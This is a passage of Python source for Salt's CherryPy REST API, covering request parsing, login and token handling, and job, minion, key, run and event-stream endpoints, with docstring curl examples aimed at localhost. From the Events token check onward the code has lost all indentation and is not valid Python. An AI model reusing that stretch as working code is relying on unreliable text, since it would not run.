    out = cherrypy.response.processors[best]
    return out(ret)
def hypermedia_out():
    '''
    Install the content-negotiating wrapper around the request handler.

    The original handler is stashed on the request object and replaced with
    ``hypermedia_handler``, which serializes the handler's output into the
    client's preferred content type.
    '''
    req = cherrypy.serving.request
    req._hypermedia_inner_handler = req.handler
    req.handler = hypermedia_handler
def process_request_body(fn):
    '''
    A decorator to skip a processor function if process_request_body is False

    BUG FIX: ``functools.wraps`` was previously applied to
    ``process_request_body`` itself (``@functools.wraps`` above the ``def``),
    which turned the decorator into a metadata-copying no-op that returned
    each processor undecorated. It now wraps the inner ``wrapped`` function,
    so the skip logic actually runs and the processor's metadata is kept.
    '''
    @functools.wraps(fn)
    def wrapped(*args, **kwargs):  # pylint: disable=C0111
        if cherrypy.request.process_request_body is not False:
            fn(*args, **kwargs)
    return wrapped
def urlencoded_processor(entity):
    '''
    Accept x-www-form-urlencoded data (run through CherryPy's formatter)
    and reformat it into a Low State data structure.

    Since we can't easily represent complicated data structures with
    key-value pairs, any more complicated requirements (e.g. compound
    commands) must instead be delivered via JSON or YAML.

    For example::

    .. code-block:: bash

        curl -si localhost:8000 -d client=local -d tgt='*' \\
                -d fun='test.kwarg' -d arg='one=1' -d arg='two=2'

    :param entity: raw POST data
    '''
    # Delegate the actual form parsing to CherryPy's stock processor, then
    # lift the parsed params onto the request for lowdata_fmt to consume.
    cherrypy._cpreqbody.process_urlencoded(entity)
    request = cherrypy.serving.request
    request.unserialized_data = entity.params
    request.raw_body = ''
@process_request_body
def json_processor(entity):
    '''
    Unserialize raw POST data in JSON format to a Python data structure.

    :param entity: raw POST data
    '''
    raw = entity.fp.read()
    try:
        parsed = json.loads(raw)
    except ValueError:
        raise cherrypy.HTTPError(400, 'Invalid JSON document')
    cherrypy.serving.request.unserialized_data = parsed
    cherrypy.serving.request.raw_body = raw
@process_request_body
def yaml_processor(entity):
    '''
    Unserialize raw POST data in YAML format to a Python data structure.

    :param entity: raw POST data
    :raises HTTPError: 400 when the body is not valid YAML
    '''
    body = entity.fp.read()
    try:
        cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
    except (ValueError, yaml.YAMLError):
        # BUG FIX: PyYAML signals parse failures with yaml.YAMLError, which
        # is NOT a ValueError subclass; previously a malformed document
        # escaped this handler and surfaced as a 500 instead of a 400.
        raise cherrypy.HTTPError(400, 'Invalid YAML document')
    cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
    '''
    Attempt to unserialize plain text as JSON

    Some large services still send JSON with a text/plain Content-Type. Those
    services are bad and should feel bad.

    :param entity: raw POST data
    '''
    raw = entity.fp.read()
    request = cherrypy.serving.request
    try:
        request.unserialized_data = json.loads(raw)
    except ValueError:
        # Not JSON after all; hand the handler the raw text unchanged.
        request.unserialized_data = raw
    request.raw_body = raw
def hypermedia_in():
    '''
    Unserialize POST/PUT data of a specified Content-Type.

    The following custom processors all are intended to format Low State data
    and will place that data structure into the request object.

    :raises HTTPError: if the request contains a Content-Type that we do not
        have a processor for
    '''
    # Be liberal in what you accept
    ct_in_map = {
        'application/x-www-form-urlencoded': urlencoded_processor,
        'application/json': json_processor,
        'application/x-yaml': yaml_processor,
        'text/yaml': yaml_processor,
        'text/plain': text_processor,
    }

    # Do not process the body for POST requests that have specified no content
    # or have not specified Content-Length
    req = cherrypy.request
    is_post = req.method.upper() == 'POST'
    declared_length = req.headers.get('Content-Length', '0')
    if is_post and declared_length == '0':
        req.process_request_body = False
        req.unserialized_data = None

    req.body.processors.clear()
    req.body.default_proc = cherrypy.HTTPError(
        406, 'Content type not supported')
    req.body.processors = ct_in_map
def lowdata_fmt():
    '''
    Validate and format lowdata from incoming unserialized request data

    This tool requires that the hypermedia_in tool has already been run.
    '''
    if cherrypy.request.method.upper() != 'POST':
        return

    data = cherrypy.request.unserialized_data

    # BUG FIX: a POST with an empty body leaves unserialized_data as None
    # (hypermedia_in disables body processing for Content-Length 0), and the
    # membership test below would raise TypeError inside the tool chain.
    # Bail out instead of crashing before the handler runs.
    if data is None:
        return

    # if the data was sent as urlencoded, we need to make it a list.
    # this is a very forgiving implementation as different clients set different
    # headers for form encoded data (including charset or something similar)
    if not isinstance(data, list):
        # Make the 'arg' param a list if not already
        if 'arg' in data and not isinstance(data['arg'], list):
            data['arg'] = [data['arg']]

        # Finally, make a Low State and put it in request
        cherrypy.request.lowstate = [data]
    else:
        cherrypy.serving.request.lowstate = data
# Wire the functions above into CherryPy's tool framework. The priority
# value orders execution within a hook point (lower runs earlier); tools
# without an explicit priority use CherryPy's default.
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
                                             html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
                                          salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
                                         salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
                                             hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_handler',
                                         cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
                                           lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
                                              hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
                                              salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
    '''
    The primary entry point to Salt's REST API
    '''
    exposed = True

    # Per-handler CherryPy tool configuration; subclasses extend this dict.
    _cp_config = {
        'tools.sessions.on': True,
        'tools.sessions.timeout': 60 * 10,  # 10 hours (value is in minutes)
        # 'tools.autovary.on': True,
        'tools.hypermedia_out.on': True,
        'tools.hypermedia_in.on': True,
        'tools.lowdata_fmt.on': True,
        'tools.salt_ip_verify.on': True,
    }

    def __init__(self):
        # Master opts are stashed in the global CherryPy config at app setup.
        self.opts = cherrypy.config['saltopts']
        self.api = salt.netapi.NetapiClient(self.opts)

    def exec_lowstate(self, client=None, token=None):
        '''
        Pull a Low State data structure from request and execute the low-data
        chunks through Salt. The low-data chunks will be updated to include the
        authorization token for the current session.
        '''
        lowstate = cherrypy.request.lowstate

        # Release the session lock before executing any potentially
        # long-running Salt commands. This allows different threads to execute
        # Salt commands concurrently without blocking.
        if cherrypy.request.config.get('tools.sessions.on', False):
            cherrypy.session.release_lock()

        # if the lowstate loaded isn't a list, lets notify the client
        if not isinstance(lowstate, list):
            raise cherrypy.HTTPError(400, 'Lowstates must be a list')

        # Make any requested additions or modifications to each lowstate, then
        # execute each one and yield the result.
        for chunk in lowstate:
            if token:
                chunk['token'] = token

            if client:
                chunk['client'] = client

            # Make any 'arg' params a list if not already.
            # This is largely to fix a deficiency in the urlencoded format.
            if 'arg' in chunk and not isinstance(chunk['arg'], list):
                chunk['arg'] = [chunk['arg']]

            ret = self.api.run(chunk)

            # Sometimes Salt gives us a return and sometimes an iterator
            # NOTE(review): collections.Iterator is the Python 2 location;
            # it moved to collections.abc in Python 3 -- fine for this
            # py2 codebase (see StringIO import above).
            if isinstance(ret, collections.Iterator):
                for i in ret:
                    yield i
            else:
                yield ret

    def GET(self):
        '''
        An explanation of the API with links of where to go next

        .. http:get:: /

            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000

        .. code-block:: http

            GET / HTTP/1.1
            Host: localhost:8000
            Accept: application/json

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Type: application/json
        '''
        import inspect

        # Grab all available client interfaces
        # NOTE(review): inspect.ismethod matches unbound methods only on
        # Python 2; this enumeration would need ismethod/isfunction on py3.
        clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient,
            predicate=inspect.ismethod) if not name.startswith('__')]
        clients.remove('run')  # run method calls client interfaces

        return {
            'return': "Welcome",
            'clients': clients,
        }

    @cherrypy.tools.salt_token()
    @cherrypy.tools.salt_auth()
    def POST(self, **kwargs):
        '''
        Send one or more Salt commands in the request body

        .. http:post:: /

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

            :term:`lowstate` data describing Salt commands must be sent in the
            request body.

        **Example request:**

        .. code-block:: bash

            curl -sSik https://localhost:8000 \\
                -H "Accept: application/x-yaml" \\
                -H "X-Auth-Token: d40d1e1e<...snip...>" \\
                -d client=local \\
                -d tgt='*' \\
                -d fun='test.ping' \\

        .. code-block:: http

            POST / HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            X-Auth-Token: d40d1e1e
            Content-Length: 36
            Content-Type: application/x-www-form-urlencoded

            fun=test.ping&client=local&tgt=*

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 200
            Allow: GET, HEAD, POST
            Content-Type: application/x-yaml

            return:
            - ms-0: true
              ms-1: true
              ms-2: true
              ms-3: true
              ms-4: true

        **Other examples**:

        .. code-block:: bash

            # Sending multiple positional args with urlencoded:
            curl -sSik https://localhost:8000 \\
                -d client=local \\
                -d tgt='*' \\
                -d fun='cmd.run' \\
                -d arg='du -sh .' \\
                -d arg='/path/to/dir'

            # Sending positional args and Keyword args with JSON:
            echo '[
                {
                    "client": "local",
                    "tgt": "*",
                    "fun": "cmd.run",
                    "arg": [
                        "du -sh .",
                        "/path/to/dir"
                    ],
                    "kwarg": {
                        "shell": "/bin/sh",
                        "template": "jinja"
                    }
                }
            ]' | curl -sSik https://localhost:8000 \\
                -H 'Content-type: application/json' \\
                -d@-

            # Calling runner functions:
            curl -sSik https://localhost:8000 \\
                -d client=runner \\
                -d fun='jobs.lookup_jid' \\
                -d jid='20150129182456704682' \\
                -d outputter=highstate

            # Calling wheel functions:
            curl -sSik https://localhost:8000 \\
                -d client=wheel \\
                -d fun='key.gen_accept' \\
                -d id_=dave \\
                -d keysize=4096
        '''
        return {
            'return': list(self.exec_lowstate(
                token=cherrypy.session.get('token')))
        }
class Minions(LowDataAdapter):
    '''
    Convenience URLs for working with minions
    '''
    _cp_config = dict(LowDataAdapter._cp_config, **{
        'tools.salt_token.on': True,
        'tools.salt_auth.on': True,
    })

    def GET(self, mid=None):
        '''
        A convenience URL for getting lists of minions or getting minion
        details

        .. http:get:: /minions/(mid)

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/minions/ms-3

        .. code-block:: http

            GET /minions/ms-3 HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 129005
            Content-Type: application/x-yaml

            return:
            - ms-3:
                grains.items:
                    ...
        '''
        # No mid targets every minion via the '*' glob.
        cherrypy.request.lowstate = [{
            'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
        }]
        return {
            'return': list(self.exec_lowstate(
                token=cherrypy.session.get('token'))),
        }

    def POST(self, **kwargs):
        '''
        Start an execution command and immediately return the job id

        .. http:post:: /minions

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

            :term:`lowstate` data describing Salt commands must be sent in the
            request body. The ``client`` option will be set to
            :py:meth:`~salt.client.LocalClient.local_async`.

        **Example request:**

        .. code-block:: bash

            curl -sSi localhost:8000/minions \\
                -H "Accept: application/x-yaml" \\
                -d tgt='*' \\
                -d fun='status.diskusage'

        .. code-block:: http

            POST /minions HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            Content-Length: 26
            Content-Type: application/x-www-form-urlencoded

            tgt=*&fun=status.diskusage

        **Example response:**

        .. code-block:: http

            HTTP/1.1 202 Accepted
            Content-Length: 86
            Content-Type: application/x-yaml

            return:
            - jid: '20130603122505459265'
              minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
            _links:
              jobs:
                - href: /jobs/20130603122505459265
        '''
        job_data = list(self.exec_lowstate(client='local_async',
            token=cherrypy.session.get('token')))

        # 202 Accepted: the job was queued, not completed.
        cherrypy.response.status = 202
        return {
            'return': job_data,
            '_links': {
                'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
                    for i in job_data if i],
            },
        }
class Jobs(LowDataAdapter):
    '''
    Convenience URLs for browsing the master's job cache
    '''
    _cp_config = dict(LowDataAdapter._cp_config, **{
        'tools.salt_token.on': True,
        'tools.salt_auth.on': True,
    })

    def GET(self, jid=None, timeout=''):
        '''
        A convenience URL for getting lists of previously run jobs or getting
        the return from a single job

        .. http:get:: /jobs/(jid)

            List jobs or show a single job from the job cache.

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/jobs

        .. code-block:: http

            GET /jobs HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 165
            Content-Type: application/x-yaml

            return:
            - '20121130104633606931':
                Arguments:
                - '3'
                Function: test.fib
                Start Time: 2012, Nov 30 10:46:33.606931
                Target: jerry
                Target-type: glob

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/jobs/20121130104633606931

        .. code-block:: http

            GET /jobs/20121130104633606931 HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 73
            Content-Type: application/x-yaml

            info:
            - Arguments:
                - '3'
              Function: test.fib
              Minions:
                - jerry
              Start Time: 2012, Nov 30 10:46:33.606931
              Target: '*'
              Target-type: glob
              User: saltdev
              jid: '20121130104633606931'
            return:
            - jerry:
                - - 0
                - 1
                - 1
                - 2
                - 6.9141387939453125e-06
        '''
        # NOTE(review): the ``timeout`` parameter is accepted but never used
        # in this method -- presumably kept for URL compatibility; confirm.
        lowstate = [{
            'client': 'runner',
            # With a jid look up that job's return; otherwise list the cache.
            'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs',
            'jid': jid,
        }]

        if jid:
            # Second chunk fetches the job metadata alongside the return.
            lowstate.append({
                'client': 'runner',
                'fun': 'jobs.list_job',
                'jid': jid,
            })

        cherrypy.request.lowstate = lowstate
        job_ret_info = list(self.exec_lowstate(
            token=cherrypy.session.get('token')))

        ret = {}
        if jid:
            job_ret, job_info = job_ret_info
            ret['info'] = [job_info]
        else:
            job_ret = job_ret_info[0]

        ret['return'] = [job_ret]
        return ret
class Keys(LowDataAdapter):
    '''
    Convenience URLs for working with minion keys

    .. versionadded:: 2014.7.0

    These URLs wrap the functionality provided by the :py:mod:`key wheel
    module <salt.wheel.key>` functions.
    '''
    def GET(self, mid=None):
        '''
        Show the list of minion keys or detail on a specific key

        .. versionadded:: 2014.7.0

        .. http:get:: /keys/(mid)

            List all keys or show a specific key

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/keys

        .. code-block:: http

            GET /keys HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 165
            Content-Type: application/x-yaml

            return:
              local:
              - master.pem
              - master.pub
              minions:
              - jerry
              minions_pre: []
              minions_rejected: []

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/keys/jerry

        .. code-block:: http

            GET /keys/jerry HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 73
            Content-Type: application/x-yaml

            return:
              minions:
                jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
        '''
        # NOTE(review): this mutates the *class-level* _cp_config dict at
        # request time, which affects every request to this class from then
        # on and is not thread-safe -- looks intentional-but-fragile; confirm.
        self._cp_config['tools.salt_token.on'] = True

        if mid:
            lowstate = [{
                'client': 'wheel',
                'fun': 'key.finger',
                'match': mid,
            }]
        else:
            lowstate = [{
                'client': 'wheel',
                'fun': 'key.list_all',
            }]

        cherrypy.request.lowstate = lowstate
        result = self.exec_lowstate(token=cherrypy.session.get('token'))

        return {'return': next(result, {}).get('data', {}).get('return', {})}

    def POST(self, mid, keysize=None, force=None, **kwargs):
        r'''
        Easily generate keys for a minion and auto-accept the new key

        .. versionadded:: 2014.7.0

        Example partial kickstart script to bootstrap a new minion:

        .. code-block:: text

            %post
            mkdir -p /etc/salt/pki/minion
            curl -sSk https://localhost:8000/keys \
                    -d mid=jerry \
                    -d username=kickstart \
                    -d password=kickstart \
                    -d eauth=pam \
                | tar -C /etc/salt/pki/minion -xf -

            mkdir -p /etc/salt/minion.d
            printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
            %end

        .. http:post:: /keys

            Generate a public and private key and return both as a tarball

            Authentication credentials must be passed in the request.

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -sSk https://localhost:8000/keys \
                    -d mid=jerry \
                    -d username=kickstart \
                    -d password=kickstart \
                    -d eauth=pam \
                    -o jerry-salt-keys.tar

        .. code-block:: http

            POST /keys HTTP/1.1
            Host: localhost:8000

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 10240
            Content-Disposition: attachment; filename="saltkeys-jerry.tar"
            Content-Type: application/x-tar

            jerry.pub0000644000000000000000000000070300000000000010730 0ustar  00000000000000
        '''
        # NOTE(review): class-level _cp_config mutated at request time, same
        # caveat as in GET above.
        self._cp_config['tools.hypermedia_out.on'] = False
        self._cp_config['tools.sessions.on'] = False

        lowstate = [{
            'client': 'wheel',
            'fun': 'key.gen_accept',
            'id_': mid,
        }]

        if keysize:
            lowstate[0]['keysize'] = keysize

        if force:
            lowstate[0]['force'] = force

        # Pass through auth credentials (username/password/eauth) from the form.
        lowstate[0].update(kwargs)

        cherrypy.request.lowstate = lowstate
        result = self.exec_lowstate()
        ret = next(result, {}).get('data', {}).get('return', {})

        pub_key = ret.get('pub', '')
        pub_key_file = tarfile.TarInfo('minion.pub')
        pub_key_file.size = len(pub_key)
        priv_key = ret.get('priv', '')
        priv_key_file = tarfile.TarInfo('minion.pem')
        priv_key_file.size = len(priv_key)

        # Assemble the uncompressed tarball entirely in memory.
        fileobj = StringIO.StringIO()
        tarball = tarfile.open(fileobj=fileobj, mode='w')
        tarball.addfile(pub_key_file, StringIO.StringIO(pub_key))
        tarball.addfile(priv_key_file, StringIO.StringIO(priv_key))
        tarball.close()

        headers = cherrypy.response.headers
        headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(mid)
        headers['Content-Type'] = 'application/x-tar'
        # ``.len`` is a Python 2 StringIO attribute (no equivalent on io.BytesIO).
        headers['Content-Length'] = fileobj.len
        headers['Cache-Control'] = 'no-cache'

        fileobj.seek(0)
        return fileobj
class Login(LowDataAdapter):
    '''
    Log in to receive a session token

    :ref:`Authentication information <rest_cherrypy-auth>`.
    '''
    def __init__(self, *args, **kwargs):
        super(Login, self).__init__(*args, **kwargs)

        # Resolver mints Salt eauth tokens from raw credentials.
        self.auth = salt.auth.Resolver(self.opts)

    def GET(self):
        '''
        Present the login interface

        .. http:get:: /login

            An explanation of how to log in.

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/login

        .. code-block:: http

            GET /login HTTP/1.1
            Host: localhost:8000
            Accept: text/html

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Type: text/html
        '''
        cherrypy.response.headers['WWW-Authenticate'] = 'Session'

        return {
            'status': cherrypy.response.status,
            'return': "Please log in",
        }

    def POST(self, **kwargs):
        '''
        :ref:`Authenticate  <rest_cherrypy-auth>` against Salt's eauth system

        .. http:post:: /login

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|

            :form eauth: the eauth backend configured for the user
            :form username: username
            :form password: password

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -si localhost:8000/login \\
                    -H "Accept: application/json" \\
                    -d username='saltuser' \\
                    -d password='saltpass' \\
                    -d eauth='pam'

        .. code-block:: http

            POST / HTTP/1.1
            Host: localhost:8000
            Content-Length: 42
            Content-Type: application/x-www-form-urlencoded
            Accept: application/json

            username=saltuser&password=saltpass&eauth=pam

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Type: application/json
            Content-Length: 206
            X-Auth-Token: 6d1b722e
            Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/

            {"return": {
                "token": "6d1b722e",
                "start": 1363805943.776223,
                "expire": 1363849143.776224,
                "user": "saltuser",
                "eauth": "pam",
                "perms": [
                    "grains.*",
                    "status.*",
                    "sys.*",
                    "test.*"
                ]
            }}
        '''
        if not self.api._is_master_running():
            raise salt.exceptions.SaltDaemonNotRunning(
                'Salt Master is not available.')

        # the urlencoded_processor will wrap this in a list
        if isinstance(cherrypy.serving.request.lowstate, list):
            creds = cherrypy.serving.request.lowstate[0]
        else:
            creds = cherrypy.serving.request.lowstate

        username = creds.get('username', None)
        # Validate against the whitelist.
        if not salt_api_acl_tool(username, cherrypy.request):
            raise cherrypy.HTTPError(401)

        # Mint token.
        token = self.auth.mk_token(creds)
        if 'token' not in token:
            raise cherrypy.HTTPError(401,
                'Could not authenticate using provided credentials')

        cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
        cherrypy.session['token'] = token['token']
        cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60

        # Grab eauth config for the current backend for the current user
        try:
            eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})

            # Get sum of '*' perms, user-specific perms, and group-specific perms
            # BUG FIX: copy the configured list before extending it. Previously
            # ``perms`` aliased the list stored inside self.opts, so every
            # login appended the '*' and group perms into the shared
            # external_auth configuration, duplicating entries over time.
            perms = list(eauth.get(token['name'], []))
            perms.extend(eauth.get('*', []))

            if 'groups' in token and token['groups'] is not False:
                user_groups = set(token['groups'])
                # eauth group entries are keyed with a trailing '%'.
                eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])

                for group in user_groups & eauth_groups:
                    perms.extend(eauth['{0}%'.format(group)])

            if not perms:
                raise ValueError("Eauth permission list not found.")
        except (AttributeError, IndexError, KeyError, ValueError):
            logger.debug("Configuration for external_auth malformed for "
                "eauth '{0}', and user '{1}'."
                .format(token.get('eauth'), token.get('name')), exc_info=True)
            raise cherrypy.HTTPError(500,
                'Configuration for external_auth could not be read.')

        return {'return': [{
            'token': cherrypy.session.id,
            'expire': token['expire'],
            'start': token['start'],
            'user': token['name'],
            'eauth': token['eauth'],
            'perms': perms,
        }]}
class Logout(LowDataAdapter):
    '''
    Class to remove or invalidate sessions
    '''
    _cp_config = dict(LowDataAdapter._cp_config)
    _cp_config.update({
        'tools.salt_token.on': True,
        'tools.salt_auth.on': True,
        'tools.lowdata_fmt.on': False,
    })

    def POST(self):
        '''
        Destroy the currently active session and expire the session cookie
        '''
        # Expire the cookie on the client first, then rotate the server-side
        # session id so the old token can no longer be replayed.
        cherrypy.lib.sessions.expire()
        cherrypy.session.regenerate()

        return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
    '''
    Class to run commands without normal session handling
    '''
    _cp_config = dict(LowDataAdapter._cp_config, **{
        'tools.sessions.on': False,
    })

    def POST(self, **kwargs):
        '''
        Run commands bypassing the :ref:`normal session handling
        <rest_cherrypy-auth>`

        .. http:post:: /run

            This entry point is primarily for "one-off" commands. Each request
            must pass full Salt authentication credentials. Otherwise this URL
            is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.

            :term:`lowstate` data describing Salt commands must be sent in the
            request body.

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -sS localhost:8000/run \\
                -H 'Accept: application/x-yaml' \\
                -d client='local' \\
                -d tgt='*' \\
                -d fun='test.ping' \\
                -d username='saltdev' \\
                -d password='saltdev' \\
                -d eauth='pam'

        .. code-block:: http

            POST /run HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            Content-Length: 75
            Content-Type: application/x-www-form-urlencoded

            client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 73
            Content-Type: application/x-yaml

            return:
            - ms-0: true
              ms-1: true
              ms-2: true
              ms-3: true
              ms-4: true

        The /run endpoint can also be used to issue commands using the salt-ssh subsystem.

        When using salt-ssh, eauth credentials should not be supplied. Instead, authentication
        should be handled by the SSH layer itself. The use of the salt-ssh client does not
        require a salt master to be running. Instead, only a roster file must be present
        in the salt configuration directory.

        All SSH client requests are synchronous.

        **Example SSH client request:**

        .. code-block:: bash

            curl -sS localhost:8000/run \\
                -H 'Accept: application/x-yaml' \\
                -d client='ssh' \\
                -d tgt='*' \\
                -d fun='test.ping'

        .. code-block:: http

            POST /run HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            Content-Length: 75
            Content-Type: application/x-www-form-urlencoded

            client=ssh&tgt=*&fun=test.ping

        **Example SSH response:**

        .. code-block:: http

                return:
                - silver:
                  fun: test.ping
                  fun_args: []
                  id: silver
                  jid: '20141203103525666185'
                  retcode: 0
                  return: true
                  success: true
        '''
        # Credentials ride along inside the lowstate chunks; no session token.
        return {
            'return': list(self.exec_lowstate()),
        }
class Events(object):
    '''
    Expose the Salt event bus

    The event bus on the Salt master exposes a large variety of things, notably
    when executions are started on the master and also when minions ultimately
    return their results. This URL provides a real-time window into a running
    Salt infrastructure.

    .. seealso:: :ref:`events`
    '''
    exposed = True

    # Streaming endpoint: disable body/output transformation and keep the
    # connection open; authentication is performed manually in the handler.
    _cp_config = dict(LowDataAdapter._cp_config, **{
        'response.stream': True,
        'tools.encode.encoding': 'utf-8',

        # Auth handled manually below
        'tools.salt_token.on': True,
        'tools.salt_auth.on': False,

        'tools.hypermedia_in.on': False,
        'tools.hypermedia_out.on': False,
    })
    def __init__(self):
        # Master opts are stashed in the global CherryPy config at app setup.
        self.opts = cherrypy.config['saltopts']
        # Resolver is used to validate raw Salt eauth tokens (_is_valid_token).
        self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_sesion, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_sesion.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.debug('opening') };
source.onerror = function(e) { console.debug('error!', e) };
source.onmessage = function(e) {
console.debug('Tag: ', e.data.tag)
console.debug('Data: ', e.data.data)
};
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
